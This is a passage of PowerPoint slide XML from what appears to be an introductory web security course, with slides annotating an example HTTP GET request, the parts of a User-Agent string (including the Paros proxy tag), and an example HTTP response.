          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Example HTTP Request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59398" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="381000" y="1671638"/>
            <a:ext cx="4876800" cy="397033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marL="163513" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>GET /search HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="163513" eaLnBrk="0" hangingPunct="0"/>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Accept: */*</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Accept-Language: en-us</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727) Paros/3.2.13</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Host: www.google.com</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Proxy-Connection: Keep-Alive</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Cookie:PREF=ID=6aa36b61eeb273f3:TM=1197306698:LM=1198722688:GM=1:S=CZy0oS0p2DosVQFK</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Content-length: 0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34823" name="TextBox 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5942390" y="5073650"/>
            <a:ext cx="30480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800" b="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>The payload of this request has no content.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34824" name="Straight Arrow Connector 9"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="34823" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2514600" y="5394325"/>
            <a:ext cx="3427790" cy="82551"/>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4825" name="Rounded Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6704390" y="1416050"/>
            <a:ext cx="1447800" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1666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round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a14:hiddenLine>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34826" name="TextBox 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5942390" y="1416050"/>
            <a:ext cx="3048000" cy="915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800" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>GET Request: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>The client is requesting this web page using the GET method</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34827" name="Straight Arrow Connector 9"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="34826" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2873376" y="1857376"/>
            <a:ext cx="3069014" cy="16668"/>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4828" name="TextBox 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5942390" y="2482850"/>
            <a:ext cx="3048000" cy="1190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800" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>User Agent String: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Identifies the type of client software and summarizes its capabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34829" name="Straight Arrow Connector 9"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="34828" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5105400" y="3078163"/>
            <a:ext cx="836990" cy="274637"/>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4830" name="TextBox 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5942390" y="3854450"/>
            <a:ext cx="30480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800" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Cookie: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Provides one or more state variables previously set by a server on this client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34831" name="Straight Arrow Connector 9"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5105400" y="4436533"/>
            <a:ext cx="908352" cy="405342"/>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6" name="AutoShape 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="5749925"/>
            <a:ext cx="2895600" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCC00"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Keep in mind </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>the header ends </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>with a blank line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bwMode="gray">
          <a:xfrm>
            <a:off x="381000" y="685800"/>
            <a:ext cx="8382000" cy="4114800"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Web clients are considered the User-Agent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Usually a browser, but not always!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Typically identified in an HTTP header field</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Consider:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727) Paros/3.2.13</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Mozilla/4.0: This signifies that the browser is compliant with the standards set by Netscape</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>MSIE 7.0: Internet Explorer 7.0 is the software type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Windows NT 5.1: This browser is running on Windows XP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>NT 6.0 is Vista/2008, 5.2 is XP 64-bit/2003, 5.1 is XP, 5.01 is Win2K SP1, 5.0 is Win2K</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>.NET CLR 1.1… and 2.0…  These two versions of the .NET client are supported</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Paros: This string was added by the Paros interception proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Any of these items can be spoofed, set to any value an attacker or pen tester desires</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35843" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="-152400"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4300" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>User-Agent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ounded Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6553200" y="3886200"/>
            <a:ext cx="1447800" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1666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round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a14:hiddenLine>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36867" name="Rounded Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6553200" y="3048000"/>
            <a:ext cx="1447800" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1666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round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a14:hiddenLine>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36868" name="Rounded Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6553200" y="4648200"/>
            <a:ext cx="1447800" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1666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round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a14:hiddenLine>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36869" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Example HTTP Response</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36870" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="381000" y="2057400"/>
            <a:ext cx="4953000" cy="308451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marL="73025" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>HTTP/1.1 200 OK</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Content-Type: text/html; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>charset=UTF-8</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Server: Apache/2.2.3 (Red Hat)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Date: Tue, 01 Apr 2013 23:48:13 GMT</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Content-length: 6243</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="73025" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:cs typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36871" name="Rounded Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6553200" y="1981200"/>
            <a:ext cx="1447800" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1666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round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a14:hiddenLine>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="36872" name="Straight Arrow Connector 9"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2514600" y="2209800"/>
            <a:ext cx="3429000" cy="762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6873" name="TextBox 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5867400" y="1981200"/>
            <a:ext cx="3048000" cy="915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800" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Status Code: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Result from the request.  Often incorrectly called an error code.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36874" name="TextBox 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5867400" y="3048000"/>
            <a:ext cx="3048000" cy="1465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800" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Server Token: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
